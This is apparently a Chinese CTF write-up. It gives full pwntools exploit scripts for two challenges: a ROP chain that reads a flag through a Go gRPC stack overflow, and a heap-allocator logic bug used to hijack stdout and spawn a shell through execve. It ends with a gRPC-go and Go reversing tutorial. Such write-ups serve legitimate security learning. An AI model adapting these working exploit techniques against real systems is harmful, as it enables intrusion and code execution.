{
v51 = runtime_newobject();
v18 = (_QWORD *)runtime_newobject();
v55 = v18;
if ( dword_C95060 )
runtime_gcWriteBarrierCX();
else
*v18 = v51;
v19 = runtime_newobject();
v20 = &off_979A60;
*(_QWORD *)(v19 + 40) = &off_979A60;
if ( dword_C95060 )
v19 = runtime_gcWriteBarrierDX();
else
*(_QWORD *)(v19 + 48) = v55;
v21 = *(_QWORD *)(v19 + 48);
if ( *(void ***)(v19 + 40) != v20 )
runtime_panicdottypeI();
if ( (unsigned __int64)qword_C525A8 <= 3 )
runtime_panicIndex();
v45 = v19;
v57 = (__int64 *)v21;
v22 = off_C525A0[6];
v23 = runtime_concatstring2();
v24 = *v57;
*(_QWORD *)(*v57 + 48) = v22;
if ( dword_C95060 )
runtime_gcWriteBarrier();
else
*(_QWORD *)(v24 + 40) = v23;
if ( *(void ***)(a1 + 40) != &off_9799C0 )
runtime_panicdottypeI();
v25 = **(_QWORD **)(a1 + 48);
v43 = *(_QWORD *)(v25 + 48);
v26 = *(_QWORD *)(v25 + 40);
v59 = (_BYTE *)encoding_base64__Encoding_DecodeString();
v60 = v26;
v61 = v27;
v44[0] = v2;
v44[1] = v2;
v62 = v44;
v63 = 32LL;
v64 = 32LL;
v28 = v44;
v29 = v59;
for ( i = 0LL; i < (__int64)(3 * (v43 >> 2)); ++i ) /* 往栈中填写数据 */
{
*(_BYTE *)v28 = *v29;
v28 = (__int128 *)((char *)v28 + 1);
++v29;
}
return v45;
}
  • 程序对 “role编号为3” 这种情况进行了特殊处理,并且往栈中填写了传入数据(栈溢出)

入侵思路

有了栈溢出就可以构造 ORW 链(没法在服务端上直接获取 shell)

  • 注意:服务端会先对传入的数据进行 base64 解码(DecodeString),偏移按解码后的字节计算,因此实际偏移应该是 0xc8

由于 go 的内置函数是使用栈来传参的,因此需要一个 gadget 来为 ORW 链恢复栈帧

1
2
3
4
5
6
  0x469e60    mov    edi, 0ffffff9ch
0x469e65 mov rsi, qword ptr [rsp + 8]
0x469e6a mov edx, dword ptr [rsp + 10h]
0x469e6e mov r10d, dword ptr [rsp + 14h]
0x469e73 mov eax, 101h
0x469e78 syscall <SYS_openat>

可以使用 ROPgadget 来进行查找:

1
ROPgadget --binary ./pwn --only "add|ret" | grep "rsp"
1
0x000000000040295a : add rsp, 0x20 ; ret

我们不能直接在服务端上 write flag,这里有两种思路:

  • 重新构建 socket 将 flag 传送到客户端
  • 将 flag 拷贝到响应数据中,借用程序的代码发送数据

经过尝试发现这两种方式都不好实现,查看网上 wp 时发现了另一种方式,通过现成的 socket 传输 flag

  • 这样会导致结构错误从而使 python 没法处理数据,但是我们可以直接抓包获取 flag
  • 除此以外还有另一种方法:
1
2
p = remote("127.0.0.1", 23334)
conn = grpc.insecure_channel('localhost:23334')
  • 这两个虽然是不同的连接,但 p.recv 仍然可以接收 conn 的数据(可能底层就是抓取数据包)
1
2
3
4
5
6
7
8
try:
response: pb2.RepeaterResponse = client.Handler(
pb2.Request(
repeater=pb2.RepeaterRequest(message=b64encode(payload).decode())
)
)
except:
print(p.recv(0x1000))

于是便可以直接 ORW

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
# -*- coding:utf-8 -*-
from pwn import *
import grpc
import ggbond_pb2 as pb2
import ggbond_pb2_grpc as pb2_grpc
from base64 import b64encode

arch = 64
challenge = './pwn'

context.os='linux'
context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

# Short aliases around the pwntools tube `p`.
# NOTE(review): `p` is looked up as a module-level name when a helper is
# called, so a tube must be bound to a global `p` before using any of them.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# Log "<expr> --> 0x<value>" in bold red. `s` is an expression string that is
# eval'ed, so only pass trusted, locally written names.
# The colour codes need the ESC byte (\033); without the backslash the text
# "33[1;31;40m" would be printed literally.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Zero-pad a short leak to 4 / 8 bytes before unpacking it.
# The fill argument of bytes.ljust must be exactly one byte: b'\x00'.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

def debug():
gdb.attach(p,"")
#gdb.attach(p,"b *$rebase()\n")
pause()

def cmd(op):
sla(">",str(op))

open_go = 0x469E60
write_go = 0x478e20
read_go = 0x469EE0
sendto_go = 0x47A500
flag_addr = 0x7F058B+1
add_rsp_ret = 0x000000000040295a
pop_rdi_ret = 0x0000000000401537
pop_rsi_ret = 0x0000000000422398
pop_rdx_ret = 0x0000000000461bd1
pop_rax_ret = 0x00000000004101e6
pop_rbx_ret = 0x0000000000401a41
pop_rcx_ret = 0x00000000004cc7e3
syscall_ret = 0x000000000046a034
return_addr = 0x7ed500

def pwn():
    """Drive the exploit against the gRPC service on port 23334.

    Opens a raw TCP tube and a gRPC channel to the same port, issues the
    Whoami and RoleChange requests, then sends an oversized Repeater message
    carrying a ROP chain. If that last RPC fails, whatever arrived on the raw
    tube is printed.
    """
    # Publish the raw tube as the module-level `p`: the rl/ru/sl/... helpers
    # resolve `p` globally and would otherwise never see this connection.
    global p
    p = remote("127.0.0.1", 23334)
    conn = grpc.insecure_channel('localhost:23334')
    client = pb2_grpc.GGBondServerStub(channel=conn)

    response: pb2.WhoamiResponse = client.Handler(
        pb2.Request(
            whoami=pb2.WhoamiRequest()
        )
    )
    print(response)

    response: pb2.RoleChangeResponse = client.Handler(
        pb2.Request(
            role_change=pb2.RoleChangeRequest(role=3)
        )
    )
    print(response)

    # 0xc8 filler bytes, then the chain that overwrites the return address.
    payload = b"a"*0xc8
    # open_go(flag_addr, 0, 0) -- arguments follow on the stack
    # (presumably the Go stack-based calling convention; confirm in a debugger).
    payload += p64(open_go)
    payload += p64(add_rsp_ret)
    payload += p64(flag_addr)
    payload += p64(0)
    payload += p64(0)
    payload += p64(0)
    # read_go(9, 0xc000200000, 0x100) -- fd 9 is assumed to be the file just opened.
    payload += p64(read_go)
    payload += p64(add_rsp_ret)
    payload += p64(9)
    payload += p64(0xc000200000)
    payload += p64(0x100)
    payload += p64(0)
    # Raw syscall with rax=1, rdi=7, rsi=buffer, rdx=0x100: write the buffer to fd 7
    # (assumed to be the socket behind the raw tube `p`).
    payload += p64(pop_rax_ret)
    payload += p64(1)
    payload += p64(pop_rdi_ret)
    payload += p64(7)
    payload += p64(pop_rsi_ret)
    payload += p64(0xc000200000)
    payload += p64(pop_rdx_ret)
    payload += p64(0x100)
    payload += p64(syscall_ret)

    try:
        response: pb2.RepeaterResponse = client.Handler(
            pb2.Request(
                repeater=pb2.RepeaterRequest(message=b64encode(payload).decode())
            )
        )
    except Exception:
        # Catch Exception rather than everything so Ctrl-C still aborts.
        print(p.recv(0x1000))

pwn()

BuggyAllocator

1
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.6) stable release version 2.35.
1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5724ebe3943a39c4ff00f553bc288b5fbb9a2e61, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
  • 64位,dynamically,Full RELRO,Canary,NX

漏洞分析

本题目实现了一个简易的堆分配器

分配逻辑如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
if ( !len )
return 0LL;
if ( len > 0x80 )
return malloc_t(len);
chunk = (char **)&free_list[get_order(len)]; /* 链表数组 */
re = *chunk;
if ( *chunk )
{
*chunk = *(char **)re;
return re;
}
else
{
len_align = do_align(len);
return new_list(len_align);
}
  • 长度大于 0x80 使用 ptmalloc,否则使用程序实现的逻辑
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pwndbg> telescope 0x11b5ea0
00:00000x11b5ea0 ◂— 0x0
01:00080x11b5ea8 ◂— 0x291
02:00100x11b5eb0 —▸ 0x11b5f00 —▸ 0x11b5f10 —▸ 0x11b5f20 —▸ 0x11b5f30 ◂— ...
03:00180x11b5eb8 ◂— 0x3131313131313131 ('11111111')
04:00200x11b5ec0 —▸ 0x11b5eb0 —▸ 0x11b5f00 —▸ 0x11b5f10 —▸ 0x11b5f20 ◂— ...
05:00280x11b5ec8 ◂— 0x3232323232323232 ('22222222')
06:00300x11b5ed0 ◂— 0x3333333333333333 ('33333333')
07:00380x11b5ed8 ◂— 0x3333333333333333 ('33333333')
08:00400x11b5ee0 ◂— 0x3434343434343434 ('44444444')
09:00480x11b5ee8 ◂— 0x3434343434343434 ('44444444')
0a:00500x11b5ef0 ◂— 0x3535353535353535 ('55555555')
0b:00580x11b5ef8 ◂— 0x3535353535353535 ('55555555')
0c:00600x11b5f00 —▸ 0x11b5f10 —▸ 0x11b5f20 —▸ 0x11b5f30 —▸ 0x11b5f40 ◂— ...
0d:00680x11b5f08 ◂— 0x0
  • 先申请一个大缓冲区,然后分割为相同大小的小缓冲区
  • 对于没有使用的空间则会记录 free chunk 链表

程序会维护一个链表数组,并从链表数组中提取 free chunk:

1
2
3
4
pwndbg> telescope 0x404420
00:00000x404420 ◂— 0x0
01:00080x404428 —▸ 0x11b5ec0 —▸ 0x11b5eb0 —▸ 0x11b5f00 —▸ 0x11b5f10 ◂— ...
02:00100x404430 ◂— 0x0

程序会维护一个结构体数组,用于记录已经分配的 chunk:

1
2
3
4
5
6
7
8
pwndbg> telescope 0x4044A0
00:00000x4044a0 ◂— 0x0
... ↓ 4 skipped
05:00280x4044c8 —▸ 0x11b5ed0 ◂— 0x3333333333333333 ('33333333')
06:00300x4044d0 ◂— 0x10
07:00380x4044d8 —▸ 0x11b5ee0 ◂— 0x3434343434343434 ('44444444')
08:00400x4044e0 ◂— 0x10
09:00480x4044e8 —▸ 0x11b5ef0 ◂— 0x3535353535353535 ('55555555')

释放逻辑如下:

1
2
3
4
5
6
7
8
9
10
if ( a2 <= 0x80 )
{
order = get_order(a2);
*a1 = free_list[order];
free_list[order] = a1;
}
else
{
free_s(a1);
}
  • 首先确定目标 chunk 在结构体数组中的位置,然后进行释放
  • 在 free chunk 中记录 free_list[order],并将 free chunk 记录为新的链表头

该漏洞是一个逻辑漏洞,本质原因是因为大缓冲区有部分空间没有第一时间初始化:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
pwndbg> telescope 0xe7aea0
00:00000xe7aea0 ◂— 0x0 /* start */
01:00080xe7aea8 ◂— 0x291
02:0010│ r9 0xe7aeb0 ◂— 0x41414141414141 /* 'AAAAAAA' */
03:00180xe7aeb8 ◂— 0x0
04:00200xe7aec0 —▸ 0xe7aed0 —▸ 0xe7aee0 —▸ 0xe7aef0 —▸ 0xe7af00 ◂— ...
05:00280xe7aec8 ◂— 0x0
......
22:01100xe7afb0 —▸ 0xe7afc0 —▸ 0xe7afd0 —▸ 0xe7afe0 ◂— 0x0
23:01180xe7afb8 ◂— 0x0
24:01200xe7afc0 —▸ 0xe7afd0 —▸ 0xe7afe0 ◂— 0x0
25:01280xe7afc8 ◂— 0x0
26:01300xe7afd0 —▸ 0xe7afe0 ◂— 0x0
27:01380xe7afd8 ◂— 0x0 /* 未初始化的 free chunk 链表 */
......
48:02400xe7b0e0 ◂— 0x0
... ↓ 7 skipped
50:02800xe7b120 ◂— 0x0
... ↓ 2 skipped
53:02980xe7b138 ◂— 0xeed1 /* end */

如果我们提前在未初始化的空间中写入数据,那么程序就会误以为该空间已经初始化过了,从而将我们写入的空间分配出去

入侵思路

程序没有泄露,但 stdout 处于 bss 段可以被劫持,因此首先我们需要劫持 stdout 来泄露数据:

1
2
3
4
pwndbg> telescope 0x404420
00:00000x404420 ◂— 0x0
... ↓ 7 skipped
08:00400x404460 —▸ 0x404040 (stdout) —▸ 0x75458dc1b780 (_IO_2_1_stdout_) ◂— 0xfbad2887
  • 申请两次 chunk 即可修改 _IO_2_1_stdout_

泄露完成以后就是高版本 libc 利用的过程了:

  • 劫持 libc GOT
  • 劫持 stack
  • 劫持 IO
  • 劫持 exit_hook
  • 劫持 tls_dtor_list_addr

由于我们已经劫持了程序的 free_list,可以进行任意读写,因此这里选择劫持栈

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
# -*- coding:utf-8 -*-
from pwn import *

# Target description and pwntools context configuration.
arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.35.so')

# Short aliases around the tube `p`. They look `p` up at call time, so `p`
# must exist as a module-level name before any of them is used.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# lg takes the *name* of a variable and evaluates it; only pass trusted names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Zero-pad a short leak to the full word width before unpacking it.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

# Choose the target: a local process when `local` is truthy, otherwise the remote service.
local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb to the tube `p` (the alternative breakpoint script and the pause are disabled)."""
    gdb.attach(p,"")
    #gdb.attach(p,"b *$rebase()\n")
    #pause()

def cmd(op):
    """Wait for the ">" prompt and send `op` (converted to text) as one line."""
    sla(">",str(op))

def add(index,size,data):
    """Pick option 1, then answer the "idx", "size" and "Content" prompts.

    `index` and `size` are sent as text lines; `data` is sent as-is, without
    a trailing newline.
    """
    cmd(1)
    sla("idx",str(index))
    sla("size",str(size))
    sa("Content",data)

def dele(index):
    """Pick option 2 and answer the "idx" prompt with `index`."""
    cmd(2)
    sla("idx",str(index))

def stdout_leak(start,end):
    """Build the 0x30-byte blob written over the head of the stdout FILE object.

    Layout: the flags word 0xfbad1800, three zero qwords, then `start` and
    `end`. These presumably land on _IO_write_base / _IO_write_ptr so the
    next flush prints the bytes in [start, end) -- check against the glibc
    2.35 FILE layout.
    """
    payload = p64(0xfbad1800)+p64(0)*3
    payload += p64(start)+p64(end)
    return payload

#debug()

free_list_addr = 0x404420
chunk_list_addr = 0x4044A0
stdout_addr = 0x404040

# Fill a 0x280-byte allocation with copies of (free_list_addr+0x40) and free it,
# so the memory later reused as the small-chunk pool already holds forged
# "next" pointers in the part the allocator has not initialised yet.
add(0,0x280,p64(free_list_addr+0x40)*(0x280//8))
dele(0)
# Take 0x14 chunks of size 0x10 (indices 0..0x13).
for i in range(0x14):
    add(i,0x10,chr(ord('A')+i)*7)
# The next 0x10 chunk receives the stdout pointer address plus a forged link.
add(0x14,0x10,p64(stdout_addr)+p64(free_list_addr+0x40))

add(0x15,0x48,'\x80')
payload = stdout_leak(0x404040,0x404410)
add(0x16,0x48,payload)

ru(": ")
leak_addr = u64(p.recv(6).ljust(8,b'\x00'))
libc_base = leak_addr - 0x21b780
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

ru("\xf0") # 0x1fc6ff0
leak_addr = u64(p.recv(4).ljust(8,b'\x00'))*0x100
heap_base = leak_addr - 0x11f00
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

environ = libc_base + libc.sym['environ']
system = libc_base + libc.sym['system']
success("environ >> "+hex(environ))
success("system >> "+hex(system))

add(0x17,0x50,p64(stdout_addr)+p64(free_list_addr+0x60))
add(0x18,0x48,'\x80')
payload = stdout_leak(environ,environ+8)
add(0x19,0x48,payload)

ru(": ")
leak_addr = u64(p.recv(6).ljust(8,b'\x00'))
stack_addr = leak_addr - 0x140
success("leak_addr >> "+hex(leak_addr))
success("stack_addr >> "+hex(stack_addr))

pop_rax_ret = libc_base + 0x0000000000045eb0
pop_rdi_ret = libc_base + 0x000000000002a3e5
pop_rsi_ret = libc_base + 0x000000000002be51
pop_rdx_r12_ret = libc_base + 0x000000000011f2e7
syscall_addr = libc_base + 0x0000000000029db4
binsh_addr = libc_base + 0x1d8678

add(0x20,0x50,p64(stack_addr))
payload = p64(pop_rax_ret)+p64(59)
payload += p64(pop_rdi_ret)+p64(binsh_addr)
payload += p64(pop_rsi_ret)+p64(0)
payload += p64(pop_rdx_r12_ret)+p64(0)+p64(0)
payload += p64(syscall_addr)

#pause()
add(0x21,0x68,payload)

p.interactive()

RPC & gRPC

RPC 全称 Remote Procedure Call,中文译为远程过程调用

  • 使用 RPC 进行通信,调用远程函数就像调用本地函数一样
  • RPC 底层会做好数据的序列化与传输,从而能使我们更轻松地创建分布式应用和服务

gRPC 是RPC的一种,典型特征就是使用 protobuf 作为其 IDL 接口定义语言

  • 使用 gRPC,我们只需要定义好每个 API 的 Request 和 Response,剩下的 gRPC 这个框架会帮我们自动搞定

gRPC 的通信流程:

  • 定义IDL,即我们的接口文档(后缀为.proto)
  • 编译 proto 文件,得到存根(stub)文件
  • 服务端(gRPC Server)实现第一步定义的接口并启动,这些接口的定义在存根文件里面
  • 客户端借助存根文件调用服务端的函数,虽然客户端调用的函数是由服务端实现的,但是调用起来就像是本地函数一样

gRPC-go 基础知识

接下来用 go 语言写一个 gRPC 案例

先使用如下命令进行初始化:

1
go mod init go-test
  • “go-test” 为 module 名称,程序会生成一个 go.mod
1
go mod tidy
  • 整理依赖:补全代码中用到但缺失的模块、移除未使用的模块(并不会把依赖升级到最新版本),同时更新 go.mod 条目并生成 go.sum

定义 protobuf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// Greeter service definition (proto3): one unary RPC, SayHello, which takes
// a HelloRequest and returns a HelloReply.
syntax = "proto3";

package greeter.srv;

option go_package = "proto/greeter";

service Greeter { // declares the Greeter service
rpc SayHello (HelloRequest) returns (HelloReply) {}
}

message HelloRequest { // request message format
string name = 1;
}

message HelloReply { // response message format
string message = 1;
}

将 proto 文件编译为存根文件:

1
protoc --proto_path=proto  --go_out=proto  --go_opt=paths=source_relative proto/greeter.proto
  • --proto_path:指定 import 路径
  • --go_out:指定输出文件路径
  • --go_opt:指定参数(paths=source_relative 表示生成文件输出使用相对路径)
  • 被编译的 .proto 文件放在最后面

也可以使用集成化工具 powerproto 来进行编译,安装方法如下:

1
go install github.com/storyicon/powerproto/cmd/powerproto@latest 
1
2
3
4
git clone https://github.com/storyicon/powerproto.git
cd powerproto
make
cp dist/powerproto-linux-amd64 /usr/local/bin/powerproto

powerproto 常用命令如下:

1
2
3
powerproto init /* 初始化 */
powerproto tidy /* 整理配置文件 */
powerproto build proto/greeter.proto /* 编译proto */
  • 初始化完成后会生成 powerproto.yaml 文件,在其中我们可以设置 proto 的版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# powerproto.yaml, created by `powerproto init`. Tool versions are pinned here.
scopes:
  - ./
protoc: v3.7.1 # protoc version; edit to change it
protocWorkDir: ""
plugins:
  protoc-gen-go: google.golang.org/protobuf/cmd/protoc-gen-go@v1.26.0 # protoc-gen-go version; edit to change it
  protoc-gen-go-grpc: google.golang.org/grpc/cmd/protoc-gen-go-grpc@v1.3.0 # protoc-gen-go-grpc version; edit to change it
repositories:
  GOOGLE_APIS: https://github.com/googleapis/googleapis@75e9812478607db997376ccea247dd6928f70f45
options:
  - --go_out=.
  - --go_opt=paths=source_relative
  - --go-grpc_out=.
  - --go-grpc_opt=paths=source_relative
importPaths:
  - .
  - $GOPATH
  - $POWERPROTO_INCLUDE
  - $SOURCE_RELATIVE
  - $GOOGLE_APIS/github.com/googleapis/googleapis
postActions: []
postShell: ""

编译完成后的存根文件部分代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
// GreeterServer is the server-side interface of the Greeter service; it
// declares the single method SayHello.
type GreeterServer interface {
SayHello(context.Context, *HelloRequest) (*HelloReply, error)
}
/* context.Context: the call context
HelloRequest: the request argument */

// GreeterClient is the client-side interface of the Greeter service; SayHello
// takes the same request as the server method plus optional call options.
type GreeterClient interface {
SayHello(ctx context.Context, in *HelloRequest, opts ...grpc.CallOption) (*HelloReply, error)
}
/* context.Context: the call context
HelloRequest: the request argument
grpc.CallOption: an interface that defines a before hook and an after hook */
  • 定义了服务端和客户端关于模块函数的接口
  • 该接口对应的函数是定义在服务端上的,但客户端可以通过该接口来调用该函数

服务端 API 的实现:

1
2
3
4
5
6
7
8
9
10
11
12
// Greeter_ServiceDesc describes the Greeter service: its name, the interface
// an implementation must satisfy, and the handler for each method.
var Greeter_ServiceDesc = grpc.ServiceDesc{ /* build a ServiceDesc value */
ServiceName: "greeter.srv.Greeter", /* service name */
HandlerType: (*GreeterServer)(nil), /* interface type the implementation is checked against */
Methods: []grpc.MethodDesc{ /* unary (single request/response) methods */
{
MethodName: "SayHello", /* method name */
Handler: _Greeter_SayHello_Handler, /* handler function for this method */
},
},
Streams: []grpc.StreamDesc{},
Metadata: "proto/greeter.proto", /* metadata: the originating proto file */
}
  • grpc.ServiceDesc 对象将会作为 RegisterService 的参数
1
2
3
// RegisterGreeterServer registers srv with s as the implementation of the
// service described by Greeter_ServiceDesc.
func RegisterGreeterServer(s grpc.ServiceRegistrar, srv GreeterServer) {
s.RegisterService(&Greeter_ServiceDesc, srv)
}
  • RegisterService 为注册函数,将一个 grpc.ServiceDesc 对象注册到系统
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// _Greeter_SayHello_Handler is the server-side entry point for SayHello.
// It decodes the request with dec, then calls srv's SayHello either directly
// (no interceptor) or through the interceptor. A decode error is returned
// as-is with a nil response.
func _Greeter_SayHello_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) {
in := new(HelloRequest) /* allocate the object that receives the client's request data */
if err := dec(in); err != nil {
return nil, err
}
if interceptor == nil { /* no interceptor registered: call the target method directly */
return srv.(GreeterServer).SayHello(ctx, in)
}
info := &grpc.UnaryServerInfo{
Server: srv,
FullMethod: Greeter_SayHello_FullMethodName,
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(GreeterServer).SayHello(ctx, req.(*HelloRequest))
} /* otherwise call the interceptor, handing it the target method wrapped as handler */
return interceptor(ctx, in, info, handler)
}
  • 核心点就是接收客户端的流对象,调用服务端上的函数并响应

客户端 API 的实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
// greeterClient implements GreeterClient on top of a client connection.
type greeterClient struct { 
cc grpc.ClientConnInterface /* connection interface that provides the methods used to perform RPCs */
}

// NewGreeterClient wraps cc in a greeterClient and returns it as a GreeterClient.
func NewGreeterClient(cc grpc.ClientConnInterface) GreeterClient {
/* Create a client:
argument: the connection established between client and server
returns: a greeterClient struct */
return &greeterClient{cc} /* build a greeterClient initialised with cc and return it */
}

// SayHello performs the RPC by calling Invoke on the wrapped connection.
// It returns the reply, or nil and the error if Invoke fails.
func (c *greeterClient) SayHello(ctx context.Context, in *HelloRequest, opts ...grpc.CallOption) (*HelloReply, error) { /* client-side implementation of the interface */
out := new(HelloReply) /* allocate the HelloReply that receives the response */
err := c.cc.Invoke(ctx, Greeter_SayHello_FullMethodName, in, out, opts...) /* call the connection's Invoke method */
if err != nil {
return nil, err
}
return out, nil
}
  • 客户端接口的核心步骤就是调用 Invoke 方法
1
2
3
4
5
6
7
// ClientConnInterface is the set of connection methods a generated client
// relies on: Invoke for unary calls and NewStream for streaming calls.
type ClientConnInterface interface {
// Invoke performs a unary RPC and returns after the response is received
// into reply.
Invoke(ctx context.Context, method string, args any, reply any, opts ...CallOption) error
// NewStream begins a streaming RPC.
NewStream(ctx context.Context, desc *StreamDesc, method string, opts ...CallOption) (ClientStream, error)
}
1
2
3
4
5
6
7
8
9
10
// Invoke merges the connection's default call options with opts, then runs
// the call through the configured unary interceptor if there is one, or
// through invoke directly otherwise.
func (cc *ClientConn) Invoke(ctx context.Context, method string, args, 
reply interface{}, opts ...CallOption) error {

opts = combine(cc.dopts.callOptions, opts) /* merge the connection-level call options with the per-call options */
if cc.dopts.unaryInt != nil {
return cc.dopts.unaryInt(ctx, method, args, reply, cc, invoke, opts...)
}

return invoke(ctx, method, args, reply, cc, opts...)
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
// invoke performs one unary call: it opens a client stream for method, sends
// req, and receives the response into reply. The first error from any step
// is returned.
func invoke(ctx context.Context, method string, req, reply interface{}, 
cc *ClientConn, opts ...CallOption) error {

cs, err := newClientStream(ctx, unaryStreamDesc, cc, method, opts...) /* create the client stream object */
if err != nil {
return err
}

if err := cs.SendMsg(req); err != nil { /* send the request */
return err
}

return cs.RecvMsg(reply) /* receive the response */
}
  • 核心点就是创建客户端流对象,发送请求并且接收响应

PS:和 mustEmbedUnimplementedGreeterServer 相关的内容都是 protoc-gen-go-grpc 为 gRPC 设置的保护,可以直接删去

服务端代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
package main

import (
"context"
"fmt"
greeter "go-test/proto"
"log"
"net"

"google.golang.org/grpc"
)

// server is the Greeter service implementation; it holds no state.
type server struct{}

// SayHello replies with "Hello " followed by the name carried in the request.
// The returned error is always nil.
func (s *server) SayHello(ctx context.Context, req *greeter.HelloRequest) (rsp *greeter.HelloReply, err error) {
	reply := greeter.HelloReply{Message: "Hello " + req.Name}
	return &reply, nil
}

// main listens on TCP port 52001, registers the Greeter implementation on a
// new gRPC server and serves until Serve returns. A listen or serve failure
// is fatal.
func main() {
	lis, listenErr := net.Listen("tcp", ":52001")
	if listenErr != nil {
		log.Fatalf("failed to listen: %v", listenErr)
	}

	grpcServer := grpc.NewServer()
	greeter.RegisterGreeterServer(grpcServer, &server{})

	fmt.Println("gRPC server listen in 52001...")
	if serveErr := grpcServer.Serve(lis); serveErr != nil {
		log.Fatalf("failed to serve: %v", serveErr)
	}
}

客户端代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
package main

import (
"context"
"fmt"
greeter "go-test/proto"
"log"
"time"

"google.golang.org/grpc"
)

// main dials the Greeter server at 127.0.0.1:52001 without transport
// security, calls SayHello with the name "World" under a 3-second timeout,
// and prints the reply message. A dial or call failure is fatal.
func main() {
	clientConn, dialErr := grpc.Dial("127.0.0.1:52001", grpc.WithInsecure())
	if dialErr != nil {
		log.Fatalf("connect failed: %v", dialErr)
	}
	defer clientConn.Close()

	greeterClient := greeter.NewGreeterClient(clientConn)

	callCtx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
	defer cancel()

	request := &greeter.HelloRequest{Name: "World"}
	reply, callErr := greeterClient.SayHello(callCtx, request)
	if callErr != nil {
		log.Fatalf("call service failed: %v", callErr)
	}
	fmt.Println("call service success: ", reply.Message)
}

在客户端上调用 SayHello 函数(客户端上没有实现),客户端通过 gRPC 将请求数据发送到服务端,服务端执行完成以后将响应数据发回客户端

gRPC-go 逆向分析

对于无符号的 go 语言逆向,可以先使用 IDAGolangHelper 初步恢复符号,然后编译一个有符号的 go 语言程序并用 bindiff 再次恢复符号

由于 IDA7.7 对于 IDAGolangHelper 的兼容性不好,因此这里选择使用 AlphaGolang

  • PS:这里强烈推荐 AlphaGolang,分析出来的伪代码比带符号的都好看,另外它还有其他功能

接着就可以使用 pbtk 来从二进制文件中提取 proto 文件:

1
/pbtk/extractors/from_binary.py server
  • /pbtk/extractors/from_binary.py 会生成一个 .proto 文件(可能会报错,但还是生成了文件)
  • 生成的文件和源文件几乎没有区别

接下来我们需要利用 IDA 快速找到服务端为客户端定义的函数代码

在有符号的二进制文件中搜索函数名称,很容易就能找到该函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
retval_7E3C40 __golang main__ptr_server_SayHello(
main_server_0 *s,
context_Context_0 ctx,
go_test_proto_HelloRequest_0 *req)
{
int v3; // r14
int v4; // rax
